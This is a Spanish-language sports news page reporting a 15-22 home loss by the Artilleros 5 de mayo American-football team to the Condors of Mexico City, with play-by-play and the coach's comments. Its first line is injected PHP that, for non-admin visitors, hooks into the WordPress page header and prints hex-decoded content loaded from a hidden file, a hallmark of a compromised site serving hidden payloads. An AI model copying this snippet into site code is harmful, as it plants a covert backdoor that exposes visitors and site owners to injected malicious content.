if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Artilleros tropezó en casa – La Opinión Universitaria La Opinión Universitaria
Menu

Artilleros tropezó en casa

 

Los Artilleros 5 de mayo mostraron su fuerza y coraje hasta el último segundo en su partido de presentación ante su afición, disputado la tarde del domingo ante los Condors de la Ciudad de México, en el Templo del Dolor de San Andrés Cholula.

El equipo poblano cayó 15-22 ante Condors y colocó sus números en un partido ganado y uno perdido, con el objetivo de retomar el rumbo

En un ambiente de fiesta y ante la afición poblana, el presidente del equipo, Luis Vera, fue el encargado de dar la patada inaugural de las actividades de los Artilleros en su casa, el Templo del Dolor de San Andrés Cholula.

Tras el silbatazo inicial, a las 15:00 horas, los Artilleros comenzaron moviendo las cadenas, ante la motivación de la afición.

Pese al esfuerzo y lucha del equipo poblano, los Condors de la Ciudad de México abrieron el marcador en el primer cuarto con un gol de campo.

En el segundo periodo, el equipo de la Angelópolis buscó por tierra y por aire llegar hasta las diagonales; sin embargo, la defensiva de Condors mantuvo imbatible su terreno.

Tras el descanso de medio tiempo, el conjunto de Artilleros se fue en busca de la anotación, pero la representación de Condors amplió la ventaja. El mariscal de campo Diego Pérez Arvizu se conectó con Preston Bailey y con el extra, con un marcador de 0-9.

La representación de la capital del país se volvió a hacer presente con la misma fórmula, Pérez Arvizu mandó a Preston Bailey, quien anotó su segundo touchdown de la tarde, para colocar los cartones 0-16, con el extra.

Antes del cierre del tercer cuarto reaccionaron los Artilleros, tras mover las cadenas, lograron la anotación luego de la conexión entre el mariscal de campo poblano, Andrés Chio Méndez, con Sebastián Olvera, para el 6-16.

Los Artilleros optaron por la conversión y Raymundo Torres cruzó las diagonales y reavivó la esperanza poblana con el marcador 8-16.

En el último cuarto, la representación poblana intentó contener los embates de Condors, equipo que logró anotar por conducto de Ángel Rosado, para el 8-22.

A menos de dos minutos del final, Artilleros se recuperaron y anotaron tras una nueva conexión entre el mariscal de campo, Andrés Chio y Sebastián Olvera. El extra fue positivo y el marcador se colocó 15-22.

En la última jugada del partido, el quarterback poblano, Andrés Chio, no logró conectarse con alguno de sus compañeros, y los Artilleros cayeron en su primer partido en casa.

Al final del encuentro, el entrenador en jefe de los Artilleros, Gustavo Adolfo Torres, reconoció la entrega de sus elementos y lamentó la falta de elementos titulares por lesión.

“Creo que ofensivamente, la línea no vino muy enfocada. Estuvimos cometiendo errores que no habíamos cometido antes. La falta de dos titulares y un tercero, lastimado durante toda la semana, sí afectó mucho la línea. Cuando la ofensa comenzó a carburar, la defensa estaba cansada”, explicó.

Resaltó que durante la semana trabajarán en todas las líneas con el objetivo de mejorar y lograr la victoria en busca de llegar a la postemporada.

Redacción Artilleros Verónica López

 

  • No comments

    Deja una respuesta

    Tweets recientes